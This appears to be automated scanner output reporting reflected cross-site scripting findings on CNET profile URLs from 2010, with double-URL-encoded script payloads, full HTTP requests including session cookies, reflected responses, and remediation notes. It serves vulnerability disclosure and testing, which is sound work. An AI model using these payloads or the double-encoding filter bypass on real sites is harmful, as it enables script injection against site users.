The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aef08%253cscript%253ealert%25281%2529%253c%252fscript%253eb583652dea1 was submitted in the REST URL parameter 2. This input was echoed as aef08<script>alert(1)</script>b583652dea1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/JJKaminskiaef08%253cscript%253ealert%25281%2529%253c%252fscript%253eb583652dea1/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:10:21 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:10:22 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=992
Connection: Keep-Alive
Content-Length: 31092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>JJKaminskiaef08<script>alert(1)</script>b583652dea1's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 36cea%253cscript%253ealert%25281%2529%253c%252fscript%253ea58c9795e35 was submitted in the REST URL parameter 2. This input was echoed as 36cea<script>alert(1)</script>a58c9795e35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Jasmineflower36cea%253cscript%253ealert%25281%2529%253c%252fscript%253ea58c9795e35/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:13:04 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:13:04 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=943
Connection: Keep-Alive
Content-Length: 31077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>Jasmineflower36cea<script>alert(1)</script>a58c9795e35's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7611e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec382c801d21 was submitted in the REST URL parameter 2. This input was echoed as 7611e"><script>alert(1)</script>c382c801d21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Jasmineflower7611e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec382c801d21/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:13:03 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:13:03 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=971
Connection: Keep-Alive
Content-Length: 31171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Jasmineflower7611e"><script>alert(1)</script>c382c801d21"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3c52e%253cscript%253ealert%25281%2529%253c%252fscript%253ec8536837bcb was submitted in the REST URL parameter 2. This input was echoed as 3c52e<script>alert(1)</script>c8536837bcb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Jon+Skillings3c52e%253cscript%253ealert%25281%2529%253c%252fscript%253ec8536837bcb/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:07:38 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:07:39 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=978
Connection: Keep-Alive
Content-Length: 31092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Jon Skillings3c52e<script>alert(1)</script>c8536837bcb's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42f26%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ef8d499f2f was submitted in the REST URL parameter 2. This input was echoed as 42f26"><script>alert(1)</script>4ef8d499f2f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Jon+Skillings42f26%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ef8d499f2f/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:07:37 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:07:37 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=989
Connection: Keep-Alive
Content-Length: 31121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Jon Skillings42f26"><script>alert(1)</script>4ef8d499f2f"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f6f8b%253cscript%253ealert%25281%2529%253c%252fscript%253e64ed32fd11 was submitted in the REST URL parameter 2. This input was echoed as f6f8b<script>alert(1)</script>64ed32fd11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Josh.Lowensohnf6f8b%253cscript%253ealert%25281%2529%253c%252fscript%253e64ed32fd11/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:08:09 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:08:09 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=974
Connection: Keep-Alive
Content-Length: 31147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Josh.Lowensohnf6f8b<script>alert(1)</script>64ed32fd11's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31096%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c20b3de775 was submitted in the REST URL parameter 2. This input was echoed as 31096"><script>alert(1)</script>7c20b3de775 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Josh.Lowensohn31096%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c20b3de775/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:08:04 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:08:04 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=978
Connection: Keep-Alive
Content-Length: 31201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Josh.Lowensohn31096"><script>alert(1)</script>7c20b3de775"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8cced%253cscript%253ealert%25281%2529%253c%252fscript%253e6173a60c962 was submitted in the REST URL parameter 2. This input was echoed as 8cced<script>alert(1)</script>6173a60c962 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/KentGerman8cced%253cscript%253ealert%25281%2529%253c%252fscript%253e6173a60c962/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:13:11 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:13:11 GMT
Edge-Control: no-cache
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=987
Connection: Keep-Alive
Content-Length: 31036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>KentGerman8cced<script>alert(1)</script>6173a60c962's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d512%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5a8a9657fb was submitted in the REST URL parameter 2. This input was echoed as 6d512"><script>alert(1)</script>c5a8a9657fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/KentGerman6d512%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5a8a9657fb/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:13:10 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:13:10 GMT
Edge-Control: no-cache
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=990
Connection: Keep-Alive
Content-Length: 31140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="KentGerman6d512"><script>alert(1)</script>c5a8a9657fb"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66b51%253cscript%253ealert%25281%2529%253c%252fscript%253ec054617f7cd was submitted in the REST URL parameter 2. This input was echoed as 66b51<script>alert(1)</script>c054617f7cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Leslie+Katz66b51%253cscript%253ealert%25281%2529%253c%252fscript%253ec054617f7cd/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:08:12 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:08:12 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=968
Connection: Keep-Alive
Content-Length: 31046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Leslie Katz66b51<script>alert(1)</script>c054617f7cd's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb1ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5ed168db2c was submitted in the REST URL parameter 2. This input was echoed as bb1ab"><script>alert(1)</script>5ed168db2c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Leslie+Katzbb1ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5ed168db2c/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:08:11 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:08:11 GMT
Edge-Control: no-cache
